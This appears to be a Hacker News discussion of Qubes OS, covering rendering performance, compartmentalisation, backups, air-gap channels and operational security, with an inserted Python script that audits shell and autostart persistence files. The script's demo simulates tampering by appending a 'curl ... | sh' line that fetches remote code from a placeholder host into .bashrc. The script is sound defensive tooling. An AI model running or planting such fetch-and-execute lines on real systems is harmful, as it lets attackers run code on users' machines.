I think it would be good to make it possible to deactivate certain security features such as strict graphics isolation so that users can adjust their settings to their risk acceptance level. It would also be interesting to be able to optionally replace Xen with lighter isolation mechanisms, even if the user would compromise on security here too.
Around Firefox 92 or 93 the new GPU-based renderer ported from Servo was made default and performance under Qubes became much worse. Unfortunately, it seems applications increasingly assume the presence of video acceleration and don't prioritize software rendering.
Qubes' unique choice of software-only rendering for user applications is one born out of the isolation goals for security, not what the software/drivers/hardware could do.
Only proprietary ones, so not for everyone...
So the support must be worse if you prefer free drivers?
It feels you may be conflating the "proprietary firmware blob on the GPU which is used to boot the Pi" story with the GPU driver itself.
It kind of feels like a tradeoff between protecting users who are critically in need of something like Qubes or expanding its reach to people who are less at risk and won't use it if it's too inconvenient.
I imagine audio and other realtime loads having problems the most on a heavily virtualized system like this.
I was using it well at home but could not stand it when I travelled around with my laptop.
I think Xen is mostly at fault for the issues, but I’m sure using something like KVM would be insecure, or they would have migrated already.
https://www.qubes-os.org/doc/managing-vm-kernels/#installing...
When I had similar issues in the past, I posted a question either to the mailing list or forum, and people were helpful.
If you choose Community-recommended hardware (https://forum.qubes-os.org/t/community-recommended-computers...), sleep will work fine for you.
This is by design, to provide high security, which is the point of Qubes. It's planned to allow GPU for chosen, trusted VMs: https://github.com/QubesOS/qubes-issues/issues/8552
Alternatively, you could perform a GPU passthrough, https://www.qubes-os.org/faq/#can-i-run-applications-like-ga...
I've been using vms with passed through gpu for a while and it's great but I would love to switch to qubes. I wish this was prioritized.
It might help if you used a computer with CPU horsepower that actually exists.
And in case this sounded facetious, any reasonable CPU from the past 15 years can handle software decoding of high resolution video just fine.
This all said however, if you do actually need full use of all hardware resources then being constrained to software is certainly a factor worth considering.
Brute force helps a lot, but do you want a ≥5GHz multi-core CPU burning 150W just to watch a single video stream with maximum paranoia settings?
I mean, yes?
We're not talking about bloat here, you're deliberately imposing significant overhead load for a specific purpose.
You can't really subsequently complain about performance unless you bring sufficiently powerful hardware to compensate for that overhead.
4k VP9 from youtube takes my 5950x around 20-25% CPU usage to handle with hardware acceleration disabled.
The fastest consumer CPU available 15 years ago could not handle that. Hell, even CPUs from 10 years ago couldn't do that. Add power & thermal limitations of a laptop CPU? Not a chance.
And that's just VP9! HEVC or AV1 would really put the hurt on.
To be pedantic, OP specified "HD" which is 720p. I gave him benefit of the doubt by saying "high resolution" in my reply, but I think 4K is unreasonable given the provided context. I'd wager 1080p ("Full HD") at most. There's also the question of frame rate, though we can probably safely assume either 29.976 or 59.952 fps since it's Youtube.
As an aside, software decoding performance can vary pretty significantly depending on the codec used for both encoding and decoding. Bit of a history lesson: CoreAVC was infamous for being very easy on the CPU compared to other h.264 decoders like ffmpeg.
It often helped to actually give the VM more cores (not just the default 2), but sometimes it was due to some weirdo codec/quality setting, and recoding the video just solved it. Sometimes switching to vlc (from mplayer) helped. Other times it was simply due to the sys-usb vm being overloaded.
Isn't this something GPU Virtualization is intended to solve?
I understand the usual story is that the goal is security benefits, and the compartmentalization (or rather the implied inconvenience) is the price for that. But for me the compartmentalization turned out to be a benefit on its own, and actually convenient.
I find it extremely convenient to have multiple isolated / virtual workspaces for different stuff, even if you assume attackers / malice do not exist. Having separate VMs is not the same as having separate folders. I also love the VM templates, which allow me to do all kinds of experiments (e.g. install packages in the app VM, which disappear after restart). Or run VMs with a mix of distros/versions/... Yes, I could do some of that with plain VMs, but Qubes integrates that in a way that I find very convenient. The commands for copying stuff between VMs are muscle memory at this point.
Yes, there are limitations, like the lack of GPU acceleration. But movies in 1080p play just fine without it, and I'm not a gamer, so I don't mind much. I can't play with CUDA etc. on these QubesOS machines, and scrolling web pages with large images is laggy, but I find this to be an acceptable price.
I went through multiple laptops / workstations over the years, and the situation improved a lot I think. Initially I had to solve quite a few issues with installer, some hardware not working (or requiring setting something special), or poor battery life on the laptops. But after a while that mostly either went away, especially once I switched to laptops with official Linux support (Dell Precision were good, I'm on Thinkpad P1 G7 now). The battery life is pretty decent too (especially once I disabled HT in BIOS).
Is it perfect for everyone? No, certainly not. But it sure is great for me, and I hope they keep working on it.
Love the compartmentalization and being able to route VMs to different network backends and the ability to create ephemeral domains for quick tasks.
Thank you Joanna, Marek, Andrew, and all the wonderful contributors. I couldn’t live without Qubes.
Now that I've read this, I can also remember that I was also annoyed by jerks when scrolling web pages.
I also found the backup management too complicated. I didn't want to back up entire VMs, just the data within the VMs. In principle, I would have had to start up all VMs for backups and run a backup script for each individual VM.
For backups, I don't do them the Qubes way; I do "regular" backups within the VM using rsync/duplicity/... When moving to a new machine I prefer to set up everything from scratch (and then restore the data). And it gives me all the features like incremental backups etc.
Maybe we need immutable OS + an audit layer on anything that could allow exploits to persist (bashrc and the likes).
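One concrete shape the "audit layer" idea above could take, as an added example that is not part of the original comment or of Qubes OS: a baseline of SHA-256 hashes over the usual user-level persistence points (shell rc files, autostart entries, user systemd units), and a diff that reports anything added, removed or modified. The list of paths is an assumption about common persistence locations, not an exhaustive catalogue; the sample home directory and the "tampering" are constructed inline so the script runs offline.

```python
"""Audit common user-level persistence points against a known-good baseline.

Added example, not code from Qubes OS or from the commenter. The path list
is an assumption about where user-level persistence usually lands on a
Linux desktop; extend it for the shells and desktop environment in use.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# Assumed persistence locations relative to $HOME.
PERSISTENCE_FILES = [".bashrc", ".bash_profile", ".profile", ".zshrc",
                     ".xsessionrc", ".xprofile"]
PERSISTENCE_DIRS = [".config/autostart", ".config/systemd/user"]


def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def collect_persistence_points(home: Path) -> dict:
    """Return {relative_posix_path: sha256} for every persistence file present."""
    found = {}
    for name in PERSISTENCE_FILES:
        p = home / name
        if p.is_file():
            found[name] = _sha256(p)
    for d in PERSISTENCE_DIRS:
        base = home / d
        if base.is_dir():
            for p in sorted(base.rglob("*")):
                if p.is_file():
                    found[p.relative_to(home).as_posix()] = _sha256(p)
    return found


def save_baseline(home: Path, baseline_file: Path) -> None:
    """Write the current hashes as the trusted baseline (JSON)."""
    baseline_file.write_text(json.dumps(collect_persistence_points(home), indent=2))


def diff_baseline(baseline: dict, current: dict) -> dict:
    """Classify each path as added, removed or modified relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current)
                           if baseline[p] != current[p]),
    }


def audit(home: Path, baseline_file: Path) -> dict:
    """Compare the live persistence points against the stored baseline."""
    baseline = json.loads(baseline_file.read_text())
    return diff_baseline(baseline, collect_persistence_points(home))


def demo() -> dict:
    """Constructed scenario: take a baseline, then simulate two common
    persistence tricks (appending to .bashrc, dropping an autostart entry)
    and run the audit. Returns the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)
        (home / ".bashrc").write_text("export PATH=$HOME/bin:$PATH\n")
        (home / ".config/autostart").mkdir(parents=True)
        (home / ".config/autostart/nextcloud.desktop").write_text(
            "[Desktop Entry]\nType=Application\nExec=nextcloud\n")
        baseline_file = home / "persistence-baseline.json"
        save_baseline(home, baseline_file)

        # Simulated post-compromise changes (constructed, not real malware).
        with (home / ".bashrc").open("a") as f:
            f.write("curl -s http://example.invalid/s | sh\n")
        (home / ".config/autostart/update.desktop").write_text(
            "[Desktop Entry]\nType=Application\nExec=/tmp/.u\n")
        return audit(home, baseline_file)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two caveats a practitioner would want: the baseline file and the auditing code must live somewhere the audited VM cannot rewrite (on Qubes, that means running the check from dom0 or a separate vault qube against the app qube's private volume, not from inside the same qube), and this is detection, not prevention; an immutable root plus a disposable qube removes most of these persistence points outright, which is the stronger control.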
The security profiles of many "flatpacked" applications are quite permissive (see https://flatkill.org/) so that they could be circumvented. Besides that I'm experiencing some convenience issues when accessing files on my drive. It's especially annoying when using "flatpacked" office such as onlyoffice.
Other women whose computing enthusiasm I enjoyed were Jessie Frazelle, with her writing and speaking about running everything in Docker on her laptop, and Sacha Chua, with her love for Emacs.
In this context, I'd like to mention Dr. Melanie Rieback. She is 'the CEO/Co-founder of Radically Open Security, the world’s first non-profit computer security consultancy company.' Previously in the 00's known for her research in RFID security.
Or have a look at hack conferences such as recently 38C3.
Most of the time, zero days in Xen do not affect Qubes: https://www.qubes-os.org/security/xsa/#statistics
That alternative presumably has better security, but also generally worse usability (particularly if you're going to be mobile! -- two laptops in your bag might be acceptable but comparable isolation would require more than two).
Not necessarily: https://www.qubes-os.org/faq/#how-does-qubes-os-compare-to-u...
Can I run old versions of stuff like MS-DOS or Windows 3.1 under it? Or my beloved Windows 2000? Windows 2000 with Office 2000 pro (with the patches to read the new office 2007 formats) would be awesome. I miss outliner mode in Word 2000.
Basically every criticism you hear is about correct-- principally worse graphics performance and battery life. But the performance issues for me were less bad than I expected, and the seamlessness of its usability was much much higher than I expected.
Like copy and paste, moving files between VMs, plugging usb devices into VMs, networking, etc. all pretty much just work. It's pretty impressive if you have any idea of the machinery under the hood needed to make that work.
And now I don't feel anywhere near as nervous that whatever vendor program I need to use to configure a device or browser zero day is going to compromise my system. I can read documents from adverse threat actor sources in a netless VM and feel reasonably confident that it can't phone home or steal my data, etc.
Obviously it doesn't replace real air gap security, but it's the closest thing you can get to a network of airgapped or firewalled per-application computers which you can fit into a laptop bag.
I also like that I can use software that really only works right on fedora/redhat alongside software that really only works right on debian. (Or windows, for that matter, but it's not as seamless). I like that I can substantially upgrade my operating system while running--- like I went from fedora40 to 41 just by installing the template, and switching over appvms one at a time. If anything goes wrong it's trivial to roll back, and I can have some app vms that work fine on the new stuff while others are held back if there is a compatibility issue. I like that applications that go nuts and try to use all my memory only screw up the VM that they're in instead of my whole system.
It's so nice that when I want to get something working I can spin up a vm and scribble all over it until I get it working. Binary patch my libc, whatever. Then once I've solved it, I can apply the final clean solution to a persistent template. Any random experimentation just goes away when I close the appvm. Need some program just for a single thing? install it in the appvm rather than the template and it naturally is gone later. I can be intentional about changes being either ephemeral or persistent, and never have to worry that the removal of something temporary was incomplete.
Of course YMMV, -- if you're someone who is mostly doing text and low performance graphics and can run it on a fast computer then its costs will be small. If you'd find a ten year old computer perfectly usable chances are that qubes on a modern computer won't seem slow or short on battery life to you. Particularly if you have other computers for games, 3d gfx, full screen video, etc. If you are someone who has been subjected to targeted hacking attempts the increased peace of mind will be substantial.
Depending on your use case, Qubes can be even more secure: https://www.qubes-os.org/faq/#how-does-qubes-os-compare-to-u...
- Malware which can bridge air gaps has existed for several years now and is becoming increasingly common.
Floppy disks
Hard disks used like floppies (especially plugged into a RAID controller with "auto run"-like features disabled)
Audio modem
Manual transcription via keyboard
Particularly since the common tools like SCP give way too much access unless you go through special effort.
> Floppy disks, Hard disks
As you note there are 'auto run' like issues; also file systems are not historically very robust against malicious data.
Hard disks themselves have host flash-able firmware and microcontrollers and get either DMA access (e.g. over SATA) to the system or get USB connected and the ability to pretend to be arbitrary usb devices like HID or exploit vulnerable usb drivers. So at least in theory a compromised system can turn your drive malicious such that it compromises other systems.
Though an attacker that sophisticated probably also has hypervisor escapes.
> Audio modem, Manual transcription
Personally I'm fond of just RS232 serial.
I always thought if you insert a floppy (with any OS autorun crap turned off of course), open a textfile to read, then take it out, you'd be pretty safe. (It's unfortunate the same can't be said of a USB drive).
Thanks, I missed RS-232.
Of course there absolutely have been auto-run vulnerabilities too. And modern Linux desktops have more auto-running auto-indexing stuff than ever. I've absolutely seen mounted drives being eagerly explored by gnome thumbnail generation stuff and likewise.
The challenge for modern security isn't avoiding vulnerabilities, it's avoiding whole classes of behavior that might be vulnerable because the attack surfaces are so huge that we'll inevitably miss vulnerabilities so long as they're not structurally impossible.
So for example, I'd always prefer to interact with a potentially malicious file system via an ephemeral read-only VM that reads the files and exports a network-fs like interface to my working system... It's just too hard to be certain there are no filesystem vulnerabilities-- they have huge surfaces and they're not usually tested against that. I can't even be sure the latest genius systemd feature doesn't silently run stuff on removable media (just as it did stuff like giving unprivileged users the ability to modify the system time without clearly documenting the change), if it's allowed to touch it. And if there are issues, I'll be thankful that the malware payload would have also had to contain a VM escape for it to compromise my system.
Converting untrusted PDFs into trusted ones: The Qubes Way (2013) - https://news.ycombinator.com/item?id=42401904 - Dec 2024 (45 comments)
Why one would use Qubes OS? (2023) - https://news.ycombinator.com/item?id=42200987 - Nov 2024 (16 comments)
Counter argument against QubesOS more secure by being a type 1 hypervisor - https://news.ycombinator.com/item?id=41401318 - Aug 2024 (1 comment)
Qubes OS 4.2.2 has been released - https://news.ycombinator.com/item?id=40959109 - July 2024 (5 comments)
Working with Qubes OS at the Guardian - https://news.ycombinator.com/item?id=39949882 - April 2024 (74 comments)
Qubes OS 4.2.1 has been released - https://news.ycombinator.com/item?id=39833245 - March 2024 (11 comments)
A modest update to Qubes OS - https://news.ycombinator.com/item?id=39490264 - Feb 2024 (31 comments)
Qubes OS 4.2.0 has been released - https://news.ycombinator.com/item?id=38690597 - Dec 2023 (21 comments)
QubesOS – A reasonably secure operating system - https://news.ycombinator.com/item?id=36684946 - July 2023 (135 comments)
Qubes OS 4.2-rc1 is available for testing - https://news.ycombinator.com/item?id=36178205 - June 2023 (3 comments)
New user guide: How to organize your qubes - https://news.ycombinator.com/item?id=33396604 - Oct 2022 (15 comments)
Opsec considerations when using WiFi - https://news.ycombinator.com/item?id=32148920 - July 2022 (2 comments)
What Is Qubes OS? - https://news.ycombinator.com/item?id=32036899 - July 2022 (82 comments)
Automated OS testing on physical laptops - https://news.ycombinator.com/item?id=31281107 - May 2022 (4 comments)
Qubes OS: A reasonably secure operating system - https://news.ycombinator.com/item?id=30776103 - March 2022 (97 comments)
Qubes OS 4.1.0 has been released - https://news.ycombinator.com/item?id=30215210 - Feb 2022 (1 comment)
Ask HN: Qubes OS or just separate VMs for separating work and private files? - https://news.ycombinator.com/item?id=29537961 - Dec 2021 (6 comments)
Qubes OS 4.1-rc1 has been released - https://news.ycombinator.com/item?id=28856957 - Oct 2021 (5 comments)
Qubes OS 4.0 has been released - https://news.ycombinator.com/item?id=16699900 - March 2018 (39 comments)
Qubes OS: A reasonably secure operating system - https://news.ycombinator.com/item?id=15734416 - Nov 2017 (144 comments)
Reasonably Secure Computing in the Decentralized World - https://news.ycombinator.com/item?id=15566563 - Oct 2017 (44 comments)
Toward a Reasonably Secure Laptop - https://news.ycombinator.com/item?id=14743238 - July 2017 (100 comments)
“Paranoid Mode” Compromise Recovery on Qubes OS - https://news.ycombinator.com/item?id=14218504 - April 2017 (14 comments)
Qubes OS Begins Commercialization and Community Funding Efforts - https://news.ycombinator.com/item?id=13069615 - Nov 2016 (24 comments)
Qubes OS 3.2 has been released - https://news.ycombinator.com/item?id=12604417 - Sept 2016 (30 comments)
Security challenges for the Qubes build process - https://news.ycombinator.com/item?id=11801093 - May 2016 (17 comments)
Qubes OS 3.1 has been released - https://news.ycombinator.com/item?id=11260857 - March 2016 (44 comments)
Converting untrusted PDFs into trusted ones: The Qubes Way (2013) - https://news.ycombinator.com/item?id=10538888 - Nov 2015 (5 comments)
Intel x86 considered harmful – survey of attacks against x86 over last 10 years - https://news.ycombinator.com/item?id=10458318 - Oct 2015 (169 comments)
Qubes – Secure Desktop OS Using Security by Compartmentalization - https://news.ycombinator.com/item?id=8428453 - Oct 2014 (49 comments)
Introducing Qubes 1.0 ("a stable and reasonably secure desktop OS") - https://news.ycombinator.com/item?id=4472403 - Sept 2012 (59 comments)
Qubes: an open source OS with strong security for desktop computing - https://news.ycombinator.com/item?id=2645170 - June 2011 (16 comments)
Review: Qubes OS Beta 1 — a new and refreshing approach to system security - https://news.ycombinator.com/item?id=2504274 - May 2011 (1 comment)
The Linux Security Circus: On GUI isolation - https://news.ycombinator.com/item?id=2477667 - April 2011 (47 comments)
Qubes Beta 1 has been released (strong desktop security OS) - https://news.ycombinator.com/item?id=2439096 - April 2011 (3 comments)
Qubes Architecture - actual security-oriented OS - https://news.ycombinator.com/item?id=1796384 - Oct 2010 (1 comment)
Open source Qubes OS is ultra secure - https://news.ycombinator.com/item?id=1249857 - April 2010 (7 comments)
Introducing Qubes OS - https://news.ycombinator.com/item?id=1246990 - April 2010 (20 comments)
Have we totally forgotten about mandatory access control systems?
AppArmor, SELinux? The problem isn't that they don't exist; it's that nobody knows how to use them properly.
You can even minimise the kernel attack surface these days with utilities like gVisor.
People just understand virtual machines more easily. It's easy to understand the isolation they give, and easier to reduce unnecessary potential attack vectors by having minimal images that don't contain more than necessary.
The problem is that both systems are quite difficult to use properly. The out-of-the-box configuration is good for a base increase in overall system security against common threats.
However, if you want the real isolation benefits that these MAC systems are capable of providing, you'll need a full-time security team with years of training to manage your personal desktop.
Did it help anyone pass any kind of security audit? In other words, do auditors recognize it as a valid environment for working with potentially malicious documents, or only as a toy?
(1) Qubes is open-source.
(2) Qubes is written and maintained by security professionals.
(3) Most (all?) security audits are worse than useless.
Nothing else provides a similar mix of security and usability. The alternatives are either much less secure or have much worse usability.
Of course only few people have these kinds of requirements. I'd recommend Qubes OS if you are an investigative journalist or working in offensive or defensive IT security. Everyone else can safely ignore it.
Still, even if it's not made for most of us it makes interesting design decisions that are very much of interest to this forum. And a lot of the people it is made for are here too
PS Qubes is Linux. The base domain hypervisor is Fedora-based, and while it is possible to run Windows in a "Qube," the docs and tooling clearly concentrate upon Linux (Fedora and Debian) as the primary use case.
This will let you run your email in one window, and click on a link to open it in another VM.
I've used it for a number of years.
You can install KDE, too: https://forum.qubes-os.org/t/kde-changing-the-way-you-use-qu...
When interacting remotely with untrusted services, apps, or documents, Qubes cannot be beaten.
However, if I was afraid of my laptop getting attacked with an evil maid attack, I’m sticking with my Mac, Secure Boot, and FileVault; so that my Lock Screen is less likely to be patched against me. If I’m afraid of persistent malware, I want a platform that isn’t necessarily game over if the malware gets sudo privileges once. If I’m afraid of PIN guessing attempts to break in by brute force, I want something like a modern iPhone where the guessing limit is hardware enforced, not a Linux phone where it’s software enforced.
Same for if I were in a country with a hostile government. Nothing screams "I'm hiding something and I'm malicious" like using GrapheneOS or Qubes in Russia or China. They might not see your work, but the uncommon choice by itself makes you suspect. An iPhone and Mac over there suggests wealth, and would possibly socially increase your benefit of the doubt due to white collar associations; GrapheneOS and Qubes would shred all benefit of doubt you may have enjoyed.
I sometimes think of the Tor incident at a US College. I’m not encouraging this behavior, but a college student sent bomb threats to his university. He was identified, arrested, and convicted because he was the only one using Tor on the university network. A perfect example of how the “more secure” thing used without strategy can shoot yourself in the foot.
The point is: If you are reporting on military activity in the Donetsk region, don’t be the only person in the area using Qubes and Tor. Don’t be the only person in the area with a phone pinging GrapheneOS update servers, or a laptop pinging Qubes package repositories. Heck, don’t be the only guy with a phone on the cell network identifying as Android that inexplicably never talks to Google.
In other threat models, laptops/tablets/phones could be physically secured in a safe, or kept under direct physical supervision.
Sums up WWW.
But I believe you could use a VM or container and use such. For example, with Whonix (which also works in Qubes!)
What I'd like is to use such in macOS, but alas Jobs & Cook ask a premium price for RAM on Macs.
With regards to Donetsk example (I like the example). There is a good reason being hidden in plain sight is blending in with masses. It is difficult to get such OPSEC right, and you need to consider different techniques for if one gets burned.